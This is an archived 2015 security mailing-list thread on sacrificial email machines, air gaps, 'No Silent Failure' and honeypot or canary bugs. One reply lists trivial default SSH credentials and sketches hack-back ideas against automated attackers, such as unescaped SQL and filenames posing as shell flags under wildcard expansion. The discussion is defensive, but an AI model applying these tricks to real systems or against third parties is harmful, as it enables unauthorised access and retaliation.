On 2/3/15, dan@geer.org <dan@geer.org> wrote:
... John, you know this I'm sure, but for the record the highest security places use sacrificial machines to receive e-mail and the like, to print said transmissions to paper, and then those (sacrificial) machines are sacrificed, which is to say they are reloaded/rebooted. Per message. The printed forms then cross an air gap and those are scanned before transmission to a final destination on networks of a highly controlled sort. I suspect, but do not know, that the sacrificial machines are thoroughly instrumented in the countermeasure sense.
this is defense to depths layered through hard experience lessons ;)
... For the entities of which I speak, the avoidance of silent failure is taken seriously -- which brings us 'round to your (and my) core belief: The sine qua non goal of security engineering is "No Silent Failure."
there was an interesting thread here last year on instrumenting runtimes to appear stock (vulnerable) but which fail in obvious ways when subversion is attempted. (after all, being able to observe an attack is the first step in defending against such a class...) "hack it first yourself, before your attacker does..."
Den 3 feb 2015 19:19 skrev "coderman" <coderman@gmail.com>:
On 2/3/15, dan@geer.org <dan@geer.org> wrote:
... John, you know this I'm sure, but for the record the highest security places use sacrificial machines to receive e-mail and the like, to print said transmissions to paper, and then those (sacrificial) machines are sacrificed, which is to say they are reloaded/rebooted. Per message. The printed forms then cross an air gap and those are scanned before transmission to a final destination on networks of a highly controlled sort. I suspect, but do not know, that the sacrificial machines are thoroughly instrumented in the countermeasure sense.
this is defense to depths layered through hard experience lessons ;)
... For the entities of which I speak, the avoidance of silent failure is taken seriously -- which brings us 'round to your (and my) core belief: The sine qua non goal of security engineering is "No Silent Failure."
there was an interesting thread here last year on instrumenting runtimes to appear stock (vulnerable) but which fail in obvious ways when subversion is attempted. (after all, being able to observe an attack is the first step in defending against such a class...)
"hack it first yourself, before your attacker does..."
Canary bugs / honeypot bugs?
Proven tradition out in the wild. I gather there are SSH honeypots that allow logins with trivial attempts (pi/raspberry, admin/admin..), then simply record which commands the attacker runs first. Usually they'll be scripted commands to scope out the compromised system, and if it passes muster it dials home. I don't think those honeypots are designed to make much of a human attacker, but they allow rapid identification and classification of who's attacking and offer some scope for countermeasures. For example, if your attacker is running a certain command and capturing a certain form of expected output, what happens if your honeypot gives it too much, or a different kind of output? :) Is your automated attacker using SQL to store attack data? I hope it's escaping input.. Is your attacker using stars in any commands ('grep foobar *')? Did you know you can have filenames that look like shell command flags and bash will uncritically pass them as arguments? On 03/02/15 18:55, Natanael wrote:
Den 3 feb 2015 19:19 skrev "coderman" <coderman@gmail.com <mailto:coderman@gmail.com>>:
On 2/3/15, dan@geer.org <mailto:dan@geer.org> <dan@geer.org
<mailto:dan@geer.org>> wrote:
... John, you know this I'm sure, but for the record the highest security places use sacrificial machines to receive e-mail and the like, to print said transmissions to paper, and then those (sacrificial) machines are sacrificed, which is to say they are reloaded/rebooted. Per message. The printed forms then cross an air gap and those are scanned before transmission to a final destination on networks of a highly controlled sort. I suspect, but do not know, that the sacrificial machines are thoroughly instrumented in the countermeasure sense.
this is defense to depths layered through hard experience lessons ;)
... For the entities of which I speak, the avoidance of silent failure is taken seriously -- which brings us 'round to your (and my) core belief: The sine qua non goal of security engineering is "No Silent Failure."
there was an interesting thread here last year on instrumenting runtimes to appear stock (vulnerable) but which fail in obvious ways when subversion is attempted. (after all, being able to observe an attack is the first step in defending against such a class...)
"hack it first yourself, before your attacker does..."
Canary bugs / honeypot bugs?
-- Scientific Director, IndieBio Irish Programme Got a biology-inspired business idea that $50,000 - & 3 months in a well equipped lab could accelerate? Apply for the Summer programme in Ireland: http://indie.bio/apply-to-ireland Twitter: @onetruecathal Phone: +353876363185 miniLock: JjmYYngs7akLZUjkvFkuYdsZ3PyPHSZRBKNm6qTYKZfAM peerio.com: cathalgarvey
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 02/03/2015 10:55 AM, Natanael wrote:
"hack it first yourself, before your attacker does..." Canary bugs / honeypot bugs?
"What would I do if I wanted to crack us...?" - -- The Doctor [412/724/301/703/415] [ZS] Developer, Project Byzantium: http://project-byzantium.org/ PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ IHOP: The world's largest, most popular goth club. -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJU0mXQAAoJED1np1pUQ8Rktq0P/303vPV1jvxG2YqywhtDT0uj NEhgpqn4OlsldpltfbHl6tNpNz+RQZ3E96BmFRdAbLwU3uMcJ40wlgCx3CqLny8j /XQ8HGjFEe2OwGtrB6oj3rp0VfBNSFlU7Bin9UlaylWwoiLiHG2JafB+cCwybWK+ 5i7t5YJVp+i7KzngZISwrxx0UiAuabOZJmdv2liVReVxx5jkZEAMrxz+9kcGCFJ3 5o5U5ol8rzZ+o0h1mTaeZXeWbtfvc/gS5S8nrB4R68X1weJzc2vcGylXbZINUfO5 So9x2jkQDNew3GajlMJYFJZ3LsW/qEjevisHeG0KmqdYmTaJ9zPq0tWvGHlnvYr7 BPRC+c7v7YpGHQbEJKSjyQLWUR8CU7coRYKtqQoDJDaWHFyAznIMft2+s0ygqzjC RdWFbK+k3r8WKYRoYTM865yvQ959j3qUud8yrOj/IaOgNaOdjg/Nlf7sX+l1Z9SA ZK0GCPZzUmJdsLQaDaa2TpOmYrXJr7EP9P/JpWwaSaLc67QTUvgy4QghvTRCwunZ H6ziIxNSz8DssEuLNAZbw2/hj4iVh6qqtjn4gvqcj9Vn4wyvhtkeDd/CilfiTqAH 9aQnRxi+cym3AudDllm1+8N5CNDlvZDxVIsNLvWFIzs7ptJkStEtw4QQnfO5Sag+ dkYn04bYbljLZMcnMt2P =vxOw -----END PGP SIGNATURE-----
participants (4)
-
Cathal Garvey
-
coderman
-
Natanael
-
The Doctor